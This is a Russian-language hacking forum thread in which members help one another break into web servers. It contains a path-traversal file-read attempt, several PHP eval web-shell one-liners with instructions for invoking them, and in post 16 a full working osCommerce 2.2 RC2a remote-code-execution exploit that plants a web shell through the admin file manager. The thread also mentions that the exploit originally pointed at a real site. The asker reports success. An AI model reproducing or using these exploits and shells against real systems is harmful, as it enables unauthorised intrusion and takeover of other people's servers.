Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. icekvot

    icekvot Member

    Joined:
    12 Oct 2007
    Messages:
    34
    Likes Received:
    14
    Reputations:
    0
    Подскажите. Могу читать файлы и листинг файлов в папке через cgi
    Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.
     
  2. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    а ты передавал команды?
     
  3. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    кагбэ так:

    http://127.0.0.1/index.php?cmd=ls
    и т д
     
  4. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    возможно надо сделать "Documents\ and\ Settings"
     
  5. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    В Documents and Setting незайдёшь из шелла, ибо прав нету =\
     
  6. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    в DOS формате заюзать попробуй ;)
     
  7. sideup

    sideup New Member

    Joined:
    10 Apr 2008
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0

    Да. Конечно. Но ничего.

    Пробовал <?php phpinfo(); ?> работает отлично.

    Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок

    не выдаёт, но что-то не пойму как команды выполнять

    shell.php?cmd=id не катит.
     
  8. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    переметру cmd передавай пых код
     
  9. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91

    Ошибок не выдаёт, потому что перед eval стоит @.
    Чтоб команды выполнять, надо отправлять команды через POST. Для этого можно, к примеру, написать форму, а можно пользоваться программой для подделки http-заголовка. Типа InetCrack или HTTPReq
    В общем заливай так: <?php eval(\$_GET['cmd']); ?>
     
    #9949 Root-access, 12 Nov 2009
    Last edited: 19 Jan 2010
  10. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    #10081 :mad:
     
  11. sideup

    sideup New Member

    Joined:
    10 Apr 2008
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Если не трудно можно пример такого запроса для:

    pwd;ls -l
     
  12. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    в случае с eval() то shell.php?cmd=system(ls -la);
     
  13. sideup

    sideup New Member

    Joined:
    10 Apr 2008
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Не работает из этого ничего.

    <?php phpinfo(); ?> работает отлично
     
  14. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    ты как бы вопрос там видел? нет? я повторю:
    через что ты заливаешь шелл?
    [a] - SQL инъекция
    - PHP инъкция
    [c] - Через какой-нибудь файловый менеджер.
     
  15. sideup

    sideup New Member

    Joined:
    10 Apr 2008
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0


    Вот отсюда взял

    http://www.milw0rm.com/exploits/9556
     
  16. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    хм... а в чем сложность запустить сплоит?
    я его чуть-чуть подправил... но всё же, ты руками что-ли делаешь?
    PHP:
    <?php
    print_r
    ('
    +---------------------------------------------------------------------------+
    osCommerce Online Merchant 2.2 RC2a RCE Exploit
    by Flyh4t
    mail: [email protected]
    team: http://www.wolvez.org
    dork: Powered by osCommerce
    Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
    Thx to exploits of blackh
    +---------------------------------------------------------------------------+
    '
    );
    $host ='domain.com';
    $path '/';
    $admin_path 'admin/';
    $shellcode "filename=fly.php&file_contents=test<?php%20@eval(\$_GET[aifly]);?>";
    $message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
    $message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
    $message.="Accept-Language: zh-cn\r\n";
    $message.="Content-Type: application/x-www-form-urlencoded\r\n";
    $message.="Accept-Encoding: gzip, deflate\r\n";
    $message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
    $message.="Host: $host\r\n";
    $message.="Content-Length: ".strlen($shellcode)."\r\n";
    $message.="Connection: Close\r\n\r\n";
    $message.=$shellcode;
    $fd fsockopen($host,'80');
    if(!
    $fd)
    {
        echo 
    '[~]No response from'.$host;
        die;
    }
    fputs($fd,$message);
    echo (
    "[+]Go to see U webshell : $host/fly.php");
    ?>
    шел будет тут и запускаться так domain.com/fly.php?aifly=[PHP-КОД]
     
  17. sideup

    sideup New Member

    Joined:
    10 Apr 2008
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0

    Не работает :(
     
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Угу, ты хакер. Поменял
    $host ='democn.51osc.com';
    на
    $host ='domain.com'; ? Круто!

    =====================
    sideup

    Залей туда
    <?php eval(stripslashes($_REQUEST[ev])); ?>
    и обратись к скрипту вот так:

    shell.php?ev=phpinfo();

    =======================
     
  19. sideup

    sideup New Member

    Joined:
    10 Apr 2008
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0

    СПАСИБО!!! РАБОТАЕТ. :) :) :)
     
  20. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    Угу, внимательный мистер. Вообще-то если ты не заметил по предыдущем постам, sideup, запрашивал через GET eval() когда ОН РУССКИМИ БУКВАМИ БЕРЕТ ТОЛЬКО POST. Не выебывайся :)
     
    1 person likes this.
Thread Status:
Not open for further replies.